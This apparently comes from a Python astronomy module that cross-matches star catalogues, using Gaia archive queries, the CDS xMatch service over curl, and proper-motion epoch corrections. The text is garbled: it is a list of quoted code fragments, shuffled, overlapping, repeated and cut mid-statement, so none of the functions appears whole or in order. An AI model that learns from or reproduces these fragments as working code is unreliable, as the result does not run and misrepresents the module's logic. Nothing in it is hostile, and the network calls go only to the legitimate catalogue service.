finally: os.remove(xmlfilename) # Remove temporary files", "cat[colpmDec]/3600000.*depoch # Don't shift objects with non-existing proper motion dra[numpy.isnan(cat[colpmRA])]=", "cat2 with the proper motion in right ascension in degree", "the class idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique] idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field]", "tap_upload.my_table as m on m.source_id = g.source_id\"\"\" % table_identifier, upload_resource=xmlfilename,", "_check_epoch(cat2,epoch2) depoch= epoch2-epoch1 if numpy.any(depoch != 0.): # Use proper", "same time dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat2[colpmDec2]/3600000.*depoch # Don't shift objects", "delimiter=',', skip_header=0, filling_values=-9999.99, names=True, max_rows=1, dtype='float64') # only read the", "idx = numpy.zeros(len(cat1), dtype=int) for unique in uniques: # loop", "cds PURPOSE: Cross-match against a catalog in the CDS archive", "of xcat entries: index[0] is cat index of xcat[0] HISTORY:", "*all* columns returned; this runs a query at the Gaia", "('best') select either all matches or the best match according", "Write another temporary file with the XML output of the", "savefilename= (None) if set, save the output from CDS to", "job= Gaia.launch_job_async( \"\"\"select g.*, m.RA as mRA, m.DEC as mDEC", "cat1 colRA2= ('RA') name of the tag in cat2 with", "to be ICRS) [only used when epoch != 2000.] OUTPUT:", "indicate those indices untouch will be noticed at the end", "get the column name to_list = list(data.dtype.names) # construct a", "motion to get both catalogs at the same time dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\", "posfile: posfile1.write(posfile.readline()) with open(posfilename2,'w') as posfile2: with open(posfilename,'r') as posfile:", "epoch of the coordinates in cat1 colRA2= ('RA') name of", "numpy.ones(len(cat1)) * -1. idx = numpy.zeros(len(cat1), dtype=int) for unique in", "the right ascension colDec= ('DEC') name of the tag in", "sys.stdout.write('\\r'+\"Working on CDS xMatch batch {} / {} ...\\r\"\\ .format(thisrun1,nruns))", "360., cat[ii][colDec]]-ddec[ii]) _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat) # Directly match on input RA ma=", "positions posfilename= tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w') as csvfile: wr=", "columns returned; this runs a query at the Gaia Archive,", "'-F','distMaxArcsec=%i' % maxdist, '-F','selection=%s' % selection, '-F','RESPONSEFORMAT=csv', '-F','cat1=@%s' % os.path.basename(posfilename),", "in cat2 (assumed to be ICRS) colDec2= ('DEC') name of", "degree in cat (assumed to be ICRS) [only used when", "== 0: cnt+= 1 continue if cnt < num_lines//2: posfile1.write(line)", "raise NotImplementedError(\"selection='all' CDS cross-match not currently implemented\") if epoch is", "ascension in degree in cat (assumed to be ICRS; includes", "in right ascension in degree in cat (assumed to be", "matching sources: index[0] is cat index of xcat[0]) HISTORY: 2016-09-12", "then cross-match on RA and Dec with additional matching in", "in cat colpmRA= ('pmra') name of the tag in cat", "_cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat): # Send to CDS for matching result= open(resultfilename,'w') try:", "is done else: posfile2.write(line) # Run each sys.stdout.write('\\r'+\"Working on CDS", "epoch1= 2000. if epoch2 is None: if 'ref_epoch' in cat2.dtype.fields:", "anyway # first read everything as fp64 and then convert", "tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w') as csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC']) for ii", "else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) # xmatch to v. small", "if WIN32: # windows do not have float128, but source_id", "os.path.basename(posfilename), '-F','colRA1=RA', '-F','colDec1=DEC', '-F','cat2=%s' % xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result) except subprocess.CalledProcessError:", "!= 0.): # Use proper motion to get both catalogs", "a query at the Gaia Archive, which may or may", "matching objects, index into cat2 of matching objects, angular separation", "split until the batches are small enough to not fail\"\"\"", "(assumed to be ICRS; includes cos(Dec)) [only used when epoch", "KeyError(\"'%s' does not exist in both catalog\" % col_field) uniques", "'' nruns= 2**len(runs) if nruns >= nruns_necessary: # Only run", "m2= idx[mindx] if swap: return (m2,m1,d2d[mindx]) else: return (m1,m2,d2d[mindx]) def", "fp64 and then convert source_id to int64 will keep its", "degree in cat2 (assumed to be ICRS) epoch2= (2000.) epoch", "tempfile.mktemp('.xml',dir=os.getcwd()) tab.write(xmlfilename,format='votable') #get the data release.... table_identifier = xcat.split('/')[-1] if", "nruns >= nruns_necessary: # Only run this level's match if", "import subprocess import tempfile import warnings WIN32= platform.system() == 'Windows'", "Table from astropy import units as u from ..load.download import", "to 2015. (DR1) or 2015.5 (DR2), which may lead to", "we recursively split until the batches are small enough to", "table_identifier == 'gaia2': table_identifier = 'gaiadr2' try: job= Gaia.launch_job_async( \"\"\"select", "unit on d2d array s.t. \"<\" operation can complete else:", "idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) mindx= d2d < 1e-5*u.arcsec return idx[mindx] def", "* -1. idx = numpy.zeros(len(cat2), dtype=int) else: d2d = numpy.ones(len(cat1))", "Assume this is DR1 if numpy.any(numpy.fabs(epoch-2015.) > 0.01): warn_about_epoch= True", "if numpy.any(numpy.fabs(epoch-2015.5) > 0.01): warn_about_epoch= True if warn_about_epoch: warnings.warn(\"You appear", "posfile2: for line in posfile: if cnt == 0: cnt+=", "m1 = numpy.arange(len(cat1)) idx[cat1[col_field] == unique] = idx_2[temp_idx] d2d[cat1[col_field] ==", "matches or the best match according to CDS (see 'selection'", "mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec, unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'], unit=(u.degree, u.degree),frame='icrs') idx,d2d,d3d =", "python 2/3 format string raise KeyError(\"'%s' does not exist in", "in degree in cat2 (assumed to be ICRS) colDec2= ('DEC')", "u.degree),frame='icrs') if col_field is not None: try: # check if", "tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T, names=('source_id','RA','DEC'), dtype=('int64','float64','float64')) xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd()) tab.write(xmlfilename,format='votable') #get the data", "service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2') maxdist= (2)", "the tag in cat with the declination selection= ('best') select", "if nruns >= nruns_necessary: # Only run this level's match", "using a Gaia catalog, but are not setting the epoch", "when epoch != 2000.] gaia_all_columns= (False) set to True if", "be ICRS) [only used when epoch != 2000.] gaia_all_columns= (False)", "thisrun1= 1+int(runs,2) thisrun2= 1+int(''.join([str(int(r)-1) for r in posfilename2.split('csv.')[-1].split('.')]),2) # Count", "Leung (UofT) \"\"\" if epoch1 is None: if 'ref_epoch' in", "index of xcat[0]) HISTORY: 2016-09-12 - Written based on RC", "as posfile: with open(posfilename1,'a') as posfile1: with open(posfilename2,'a') as posfile2:", "except ValueError: # Assume this is the time-out failure pass", "cat1 source, if False do the opposite (important when one", "catalog in the CDS archive using the CDS cross-matching service", "table_identifier = xcat.split('/')[-1] if table_identifier == 'gaia2': table_identifier = 'gaiadr2'", "('vizier:I/350/gaiaedr3') name of the catalog to cross-match against, in a", "to cross-match against, in a format understood by the CDS", "with the proper motion in declination in degree in cat", "posfile1: with open(posfilename,'r') as posfile: posfile1.write(posfile.readline()) with open(posfilename2,'w') as posfile2:", "used when epoch != 2000.] gaia_all_columns= (False) set to True", "from xmatch.cds back to the original catalog INPUT cat -", "# Figure out which of the hierarchy we are running", "dtype=dtype_list) else: return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype='float128') def", "# get around this by squeezing precision from int64 on", "(2000.) epoch of the coordinates in cat1 colRA2= ('RA') name", "shutil import subprocess import tempfile import warnings WIN32= platform.system() ==", "includes cos(Dec)) [only used when epoch != 2000.] colpmDec= ('pmdec')", "with the right ascension in degree in cat1 (assumed to", "both cat1/cat2 cat1[col_field] cat2[col_field] except KeyError: # python 2/3 format", "Gaia DR2 and want *all* columns returned; this runs a", "2000. _check_epoch(cat,epoch) depoch= epoch-2000. if numpy.any(depoch != 0.): # Use", "d2d)) m1= m1[mindx] m2= idx[mindx] if swap: return (m2,m1,d2d[mindx]) else:", "return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype=dtype_list) else: return numpy.genfromtxt(filename,", "ICRS) colDec2= ('DEC') name of the tag in cat2 with", "colRA2= ('RA') name of the tag in cat2 with the", "# Send to CDS for matching result= open(resultfilename,'w') try: subprocess.check_call(['curl',", "'-F','selection=%s' % selection, '-F','RESPONSEFORMAT=csv', '-F','cat1=@%s' % os.path.basename(posfilename), '-F','colRA1=RA', '-F','colDec1=DEC', '-F','cat2=%s'", "gaia_all_columns= (False) set to True if you are matching against", "INPUT: cat1 - First catalog cat2 - Second catalog maxdist=", "matching against Gaia DR2 and want *all* columns returned; this", "r in posfilename2.split('csv.')[-1].split('.')]),2) # Count the number of objects with", "True if warn_about_epoch: warnings.warn(\"You appear to be using a Gaia", "in resultfile2: if line[0] == 'a': continue resultfile.write(line) # Remove", "== unique] = temp_d2d d2d = d2d * temp_d2d.unit #", "if table_identifier == 'gaia2': table_identifier = 'gaiadr2' try: job= Gaia.launch_job_async(", "('RA') name of the tag in cat with the right", "numpy.any(numpy.fabs(epoch-2015.) > 0.01): warn_about_epoch= True elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'):", "if 'designation' not in cat.dtype.fields: # Assume this is DR1", "units as u from ..load.download import _ERASESTR def xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None,", "- Bovy (UofT) \"\"\" if selection != 'all': selection= 'best'", "- Second catalog maxdist= (2) maximum distance in arcsec colRA1=", "ICRS) [only used when epoch != 2000.] OUTPUT: Array indices", "(DR1) or 2015.5 (DR2), which may lead to incorrect matches\")", "for each cat1 source, if False do the opposite (important", "read everything as fp64 and then convert source_id to int64", "used when epoch != 2000.] OUTPUT: Array indices into cat", "os.path import platform import shutil import subprocess import tempfile import", ".format(thisrun2,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename2,posfilename2, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+_ERASESTR+'\\r') sys.stdout.flush() # Combine", "a time-out, so we recursively split until the batches are", "# Run each sys.stdout.write('\\r'+\"Working on CDS xMatch batch {} /", "the Gaia Archive, which may or may not work... savefilename=", "tag in cat with the declination selection= ('best') select either", "else: shutil.move(resultfilename,savefilename) # Match back to the original catalog mai=", "colRA1= ('RA') name of the tag in cat1 with the", "dtype=int) else: d2d = numpy.ones(len(cat1)) * -1. idx = numpy.zeros(len(cat1),", "to the original catalog mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai) def", "(http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface INPUT: cat - a catalog", "join tap_upload.my_table as m on m.source_id = g.source_id\"\"\" % table_identifier,", "2015.5 (DR2), which may lead to incorrect matches\") return None", "<reponame>henrysky/gaia_tools # Tools for cross-matching catalogs import csv import sys", "the right ascension in degree in cat1 (assumed to be", "cross-match on RA and Dec; if a string, then cross-match", "xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result) except subprocess.CalledProcessError: os.remove(posfilename) if os.path.exists(resultfilename): result.close() os.remove(resultfilename)", "Bovy (UofT) 2019-07-07 - add additional catalog field matching -", "to just get the column name to_list = list(data.dtype.names) #", "angular separation between matching objects) HISTORY: 2016-09-12 - Written -", "# check if the field actually exists in both cat1/cat2", "release.... table_identifier = xcat.split('/')[-1] if table_identifier == 'gaia2': table_identifier =", "nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+\"Working on CDS xMatch batch {} / {} ...\\r\"\\", "batch {} / {} ...\\r\"\\ .format(thisrun1,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename1,posfilename1, maxdist,selection,xcat,", "resultfile2: for line in resultfile2: if line[0] == 'a': continue", "CDS mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec, unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'], unit=(u.degree, u.degree),frame='icrs') idx,d2d,d3d", "filtered out d2d = numpy.ones(len(cat2)) * -1. idx = numpy.zeros(len(cat2),", "are different] colpmDec2= ('pmdec') name of the tag in cat2", "is the time-out failure pass else: return nruns # xMatch", "cat1[col_field] cat2[col_field] except KeyError: # python 2/3 format string raise", "True if you are matching against Gaia DR2 and want", "if 'ref_epoch' in cat.dtype.fields: if 'designation' not in cat.dtype.fields: #", "in cat2 for each cat1 source, if False do the", "0. mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if", "and Dec with additional matching in the data tag specified", "#get the data release.... table_identifier = xcat.split('/')[-1] if table_identifier ==", "colpmRA2= ('pmra') name of the tag in cat2 with the", "sys.stdout.write('\\r'+_ERASESTR+'\\r') sys.stdout.flush() # Combine results with open(resultfilename,'w') as resultfile: with", "/ {} ...\\r\"\\ .format(thisrun1,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename1,posfilename1, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+\"Working", "numpy.any(numpy.fabs(epoch-2015.5) > 0.01): warn_about_epoch= True if warn_about_epoch: warnings.warn(\"You appear to", "open(posfilename,'r') as posfile: num_lines= sum(1 for line in posfile) #", "the string OUTPUT: (index into cat1 of matching objects, index", "swap: return (m2,m1,d2d[mindx]) else: return (m1,m2,d2d[mindx]) def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC', selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec', savefilename=None,gaia_all_columns=False):", "for r in posfilename2.split('csv.')[-1].split('.')]),2) # Count the number of objects", "counting once this if is done else: posfile2.write(line) # Run", "dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) if selection != 'all': selection= 'best'", "None: if 'ref_epoch' in cat1.dtype.fields: epoch1= cat1['ref_epoch'] else: epoch1= 2000.", "for ii in range(len(cat)): wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360., cat[ii][colDec]]-ddec[ii]) _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat) #", "in both catalog\" % col_field) uniques = numpy.unique(cat1[col_field]) if swap:", "list where everything is fp64 except 'source_id' being int64 dtype_list", "read the first row max to reduce workload to just", "= mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1)) idx[cat1[col_field] == unique] = idx_2[temp_idx]", "in cat.dtype.fields: # Assume this is DR1 if numpy.any(numpy.fabs(epoch-2015.) >", "another temporary file with the XML output of the cross-match", "sys.stdout.write('\\r'+\"Working on CDS xMatch batch {} / {} ...\\r\"\\ .format(thisrun2,nruns))", "[only used when epoch != 2000.] gaia_all_columns= (False) set to", "shutil.move(resultfilename,savefilename) # Match back to the original catalog mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch,", "PURPOSE: Match a matched catalog from xmatch.cds back to the", "mDEC from %s.gaia_source as g inner join tap_upload.my_table as m", "as fp64 and then convert source_id to int64 will keep", "astropy.coordinates as acoords from astropy.table import Table from astropy import", "temporary files os.remove(posfilename) if savefilename is None: os.remove(resultfilename) else: shutil.move(resultfilename,savefilename)", "'all': selection= 'best' if selection == 'all': raise NotImplementedError(\"selection='all' CDS", "cat2 with the right ascension in degree in cat2 (assumed", "g inner join tap_upload.my_table as m on m.source_id = g.source_id\"\"\"", "fail\"\"\" # Figure out which of the hierarchy we are", "declination in degree in cat2 (assumed to be ICRS) [only", "os.remove(posfilename) if savefilename is None: os.remove(resultfilename) else: shutil.move(resultfilename,savefilename) # Match", "numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype=dtype_list) else: return numpy.genfromtxt(filename, delimiter=',',", "% os.path.basename(posfilename), '-F','colRA1=RA', '-F','colDec1=DEC', '-F','cat2=%s' % xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result) except", "by squeezing precision from int64 on source_id as source_id is", "!= 2000.] gaia_all_columns= (False) set to True if you are", "this is DR1 if numpy.any(numpy.fabs(epoch-2015.) > 0.01): warn_about_epoch= True elif", "epoch2 is None: if 'ref_epoch' in cat2.dtype.fields: epoch2= cat2['ref_epoch'] else:", "ma.rename_column('mra','RA') ma.rename_column('mdec','DEC') finally: os.remove(xmlfilename) # Remove temporary files os.remove(posfilename) if", "to True if you are matching against Gaia DR2 and", "its precision data = numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, max_rows=1,", "in cat2 (assumed to be ICRS) epoch2= (2000.) epoch of", "is cat index of xcat[0]) HISTORY: 2016-09-12 - Written based", "# the case where a class only exists in one", "proper motion in declination in degree in cat (assumed to", "which of the hierarchy we are running try: runs= ''.join([str(int(r)-1)", "be ICRS) colDec2= ('DEC') name of the tag in cat2", "'-F','request=xmatch', '-F','distMaxArcsec=%i' % maxdist, '-F','selection=%s' % selection, '-F','RESPONSEFORMAT=csv', '-F','cat1=@%s' %", "exists in one but not the other continue if swap:", "archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl", "Bovy (UofT) 2018-05-08 - Added gaia_all_columns - Bovy (UofT) \"\"\"", "the epoch to 2015. (DR1) or 2015.5 (DR2), which may", "Directly match on input RA ma= cds_load(resultfilename) if gaia_all_columns: from", "xcat[0]) HISTORY: 2016-09-12 - Written based on RC catalog code", "result.close() return None def cds_load(filename): if WIN32: # windows do", "cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\" NAME: cds_matchback PURPOSE: Match a matched catalog", "open(posfilename2,'w') as posfile2: with open(posfilename,'r') as posfile: posfile2.write(posfile.readline()) # Cut", "dtype=('int64','float64','float64')) xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd()) tab.write(xmlfilename,format='votable') #get the data release.... table_identifier =", "ma= cds_load(resultfilename) except ValueError: # Assume this is the time-out", "2016-09-12 - Written - Bovy (UofT) 2016-09-21 - Account for", "a catalog to cross match, requires 'RA' and 'DEC' keywords", "tag in cat with the proper motion in right ascension", "of the tag in cat with the proper motion in", "if numpy.any(numpy.fabs(epoch-2015.) > 0.01): warn_about_epoch= True elif 'Gaia DR2' in", "with the declination selection= ('best') select either all matches or", "else: d2d = numpy.ones(len(cat1)) * -1. idx = numpy.zeros(len(cat1), dtype=int)", "of the tag in cat2 with the proper motion in", "# Don't shift objects with non-existing proper motion dra[numpy.isnan(cat2[colpmRA2])]= 0.", "of the hierarchy we are running try: runs= ''.join([str(int(r)-1) for", "# only read the first row max to reduce workload", "we are running runs= ''.join([str(int(r)-1) for r in posfilename1.split('csv.')[-1].split('.')]) nruns=", "different] colpmDec2= ('pmdec') name of the tag in cat2 with", "is fp64 except 'source_id' being int64 dtype_list = [('{}'.format(i), numpy.float64)", "shift objects with non-existing proper motion dra[numpy.isnan(cat2[colpmRA2])]= 0. ddec[numpy.isnan(cat2[colpmDec2])]= 0.", "is DR1 if numpy.any(numpy.fabs(epoch-2015.) > 0.01): warn_about_epoch= True elif 'Gaia", "Tools for cross-matching catalogs import csv import sys import os", "objects with non-existing proper motion dra[numpy.isnan(cat2[colpmRA2])]= 0. ddec[numpy.isnan(cat2[colpmDec2])]= 0. else:", "d2d < 1e-5*u.arcsec return idx[mindx] def _check_epoch(cat,epoch): warn_about_epoch= False if", "in degree in cat1 (assumed to be ICRS) epoch1= (2000.)", "cat1 of matching objects, index into cat2 of matching objects,", "if is done else: posfile2.write(line) # Run each sys.stdout.write('\\r'+\"Working on", "{} / {} ...\\r\"\\ .format(thisrun2,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename2,posfilename2, maxdist,selection,xcat, nruns_necessary=nruns_necessary)", "the proper motion in declination in degree in cat2 (assumed", "from %s.gaia_source as g inner join tap_upload.my_table as m on", "numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) if selection != 'all': selection= 'best' if", "2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2) depoch= epoch2-epoch1 if numpy.any(depoch != 0.): #", "= [('{}'.format(i), numpy.float64) for i in to_list] dtype_list[dtype_list.index(('source_id', numpy.float64))] =", "u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if col_field is not None:", "the tag in cat with the proper motion in right", "def _check_epoch(cat,epoch): warn_about_epoch= False if 'ref_epoch' in cat.dtype.fields: if 'designation'", "the default returned by the CDS xMatch instead...\") else: ma.rename_column('mra','RA')", "degree in cat1 (assumed to be ICRS) colDec1= ('DEC') name", "ICRS) colDec1= ('DEC') name of the tag in cat1 with", "''.join([str(int(r)-1) for r in posfilename1.split('csv.')[-1].split('.')]) nruns= 2**len(runs) thisrun1= 1+int(runs,2) thisrun2=", "== 0: # the case where a class only exists", "open(posfilename,'r') as posfile: posfile1.write(posfile.readline()) with open(posfilename2,'w') as posfile2: with open(posfilename,'r')", "Gaia catalog, but are not setting the epoch to 2015.", "cat[ii][colDec]]-ddec[ii]) _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat) # Directly match on input RA ma= cds_load(resultfilename)", "_cds_match_batched(resultfilename2,posfilename2, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+_ERASESTR+'\\r') sys.stdout.flush() # Combine results with open(resultfilename,'w')", "if epoch1 is None: if 'ref_epoch' in cat1.dtype.fields: epoch1= cat1['ref_epoch']", "- a catalog to cross match, requires 'RA' and 'DEC'", "unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if col_field is not", "Write the header line with open(posfilename1,'w') as posfile1: with open(posfilename,'r')", "sure filtering out all neg ones which are untouched mindx=", "\"<\" operation can complete else: if swap: idx,d2d,d3d = mc2.match_to_catalog_sky(mc1)", "returned by the CDS xMatch instead...\") else: ma.rename_column('mra','RA') ma.rename_column('mdec','DEC') finally:", "'vizier:I/345/gaia2') maxdist= (2) maximum distance in arcsec colRA= ('RA') name", "is double # get around this by squeezing precision from", "resultfilename+'.1' resultfilename2= resultfilename+'.2' # Figure out which of the hierarchy", "with open(posfilename,'r') as posfile: posfile2.write(posfile.readline()) # Cut in half cnt=", "smaller batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma= cds_load(resultfilename) except ValueError: # Assume", "the end and filtered out d2d = numpy.ones(len(cat2)) * -1.", "2016-09-12 - Written based on RC catalog code - Bovy", "but are not setting the epoch to 2015. (DR1) or", "best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch=", "other continue if swap: temp_idx, temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1", "in cat with the right ascension colDec= ('DEC') name of", "os.remove(xmlfilename) # Remove temporary files os.remove(posfilename) if savefilename is None:", "dtype='float64') # only read the first row max to reduce", "cnt+= 1 continue if cnt < num_lines//2: posfile1.write(line) cnt+= 1", "to_list = list(data.dtype.names) # construct a list where everything is", "in range(len(cat)): wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360., cat[ii][colDec]]-ddec[ii]) _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat) # Directly match", "xmatch.cds back to the original catalog INPUT cat - original", "import astropy.coordinates as acoords from astropy.table import Table from astropy", "xMatch batch {} / {} ...\\r\"\\ .format(thisrun2,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename2,posfilename2,", "m1[mindx] m2= idx[mindx] if swap: return (m2,m1,d2d[mindx]) else: return (m1,m2,d2d[mindx])", "cat2 colpmRA2= ('pmra') name of the tag in cat2 with", "_cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma= cds_load(resultfilename) except ValueError: # Assume this is", "cat['ref_epoch'] else: epoch= 2000. _check_epoch(cat,epoch) depoch= epoch-2000. if numpy.any(depoch !=", "numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) # xmatch to v. small diff., because", "names=True, dtype='float128') def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\" NAME: cds_matchback PURPOSE: Match", "line in resultfile1: resultfile.write(line) with open(resultfilename2,'r') as resultfile2: for line", "- Written based on RC catalog code - Bovy (UofT)", "one but not the other continue if swap: temp_idx, temp_d2d,", "returned by xmatch.cds colRA= ('RA') name of the tag in", "be ICRS) [only used when epochs are different] swap= (False)", "{} ...\\r\"\\ .format(thisrun2,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename2,posfilename2, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+_ERASESTR+'\\r') sys.stdout.flush()", "retrieve all gaia columns, returning just the default returned by", "that we should # be using smaller batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try:", "/3600000.*depoch ddec= cat2[colpmDec2]/3600000.*depoch # Don't shift objects with non-existing proper", "proper motion dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra= numpy.zeros(len(cat)) ddec=", "batches are small enough to not fail\"\"\" # Figure out", "else: idx,d2d,d3d = mc1.match_to_catalog_sky(mc2) m1= numpy.arange(len(cat1)) # to make sure", "import os.path import platform import shutil import subprocess import tempfile", "1+int(''.join([str(int(r)-1) for r in posfilename2.split('csv.')[-1].split('.')]),2) # Count the number of", "the catalogs has duplicates) col_field= (None) if None, simply cross-match", "cat2 (assumed to be ICRS) [only used when epochs are", "open(resultfilename1,'r') as resultfile1: for line in resultfile1: resultfile.write(line) with open(resultfilename2,'r')", "cat of xcat entries: index[0] is cat index of xcat[0]", "that match, indices into cat of matching sources: index[0] is", "and 'DEC' keywords (see below) xcat= ('vizier:I/350/gaiaedr3') name of the", "if swap: return (m2,m1,d2d[mindx]) else: return (m1,m2,d2d[mindx]) def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC', selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec',", "name of the tag in cat2 with the proper motion", "# to make sure filtering out all neg ones which", "First catalog cat2 - Second catalog maxdist= (2) maximum distance", "ddec= numpy.zeros(len(cat)) if selection != 'all': selection= 'best' if selection", "against Gaia DR2 and want *all* columns returned; this runs", "because of a time-out, so we recursively split until the", "(sometimes?) fails for large matches, because of a time-out, so", "so we recursively split until the batches are small enough", "in posfile) # Write the header line with open(posfilename1,'w') as", "# Tools for cross-matching catalogs import csv import sys import", "matched coords in CDS mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec, unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'],", "non-zero epoch difference - Bovy (UofT) \"\"\" if selection !=", "open(posfilename2,'a') as posfile2: for line in posfile: if cnt ==", "at the same time dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat2[colpmDec2]/3600000.*depoch # Don't", "ascension in degree in cat1 (assumed to be ICRS) colDec1=", "for Gaia epoch 2015 - Bovy (UofT) 2018-05-08 - Added", "if savefilename is None: os.remove(resultfilename) else: shutil.move(resultfilename,savefilename) # Match back", "colpmRA= ('pmra') name of the tag in cat with the", "- Written - Bovy (UofT) 2016-09-21 - Account for Gaia", "degree in cat2 (assumed to be ICRS; includes cos(Dec)) [only", "tag in cat2 with the right ascension in degree in", "xMatch failed because of time-out, split posfilename1= posfilename+'.1' posfilename2= posfilename+'.2'", "!= 2000.] OUTPUT: Array indices into cat of xcat entries:", "'-X','POST', '-F','request=xmatch', '-F','distMaxArcsec=%i' % maxdist, '-F','selection=%s' % selection, '-F','RESPONSEFORMAT=csv', '-F','cat1=@%s'", "not currently implemented\") # Write positions posfilename= tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename= tempfile.mktemp('.csv',dir=os.getcwd())", "INPUT cat - original catalog xcat - matched catalog returned", "have an unit on d2d array s.t. \"<\" operation can", "in degree in cat (assumed to be ICRS) [only used", "d2d = d2d * temp_d2d.unit # make sure finally we", "the proper motion in right ascension in degree in cat2", "= idx_2[temp_idx] d2d[cat1[col_field] == unique] = temp_d2d d2d = d2d", "< maxdist*u.arcsec) & (0.*u.arcsec <= d2d)) m1= m1[mindx] m2= idx[mindx]", "os.remove(resultfilename) else: shutil.move(resultfilename,savefilename) # Match back to the original catalog", "into cat1 of matching objects, index into cat2 of matching", "numpy.float64))] = ('source_id', numpy.uint64) return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True,", "0: cnt+= 1 continue if cnt < num_lines//2: posfile1.write(line) cnt+=", "as mDEC from %s.gaia_source as g inner join tap_upload.my_table as", "as posfile2: with open(posfilename,'r') as posfile: posfile2.write(posfile.readline()) # Cut in", "= numpy.zeros(len(cat1), dtype=int) for unique in uniques: # loop over", "both catalogs at the same time 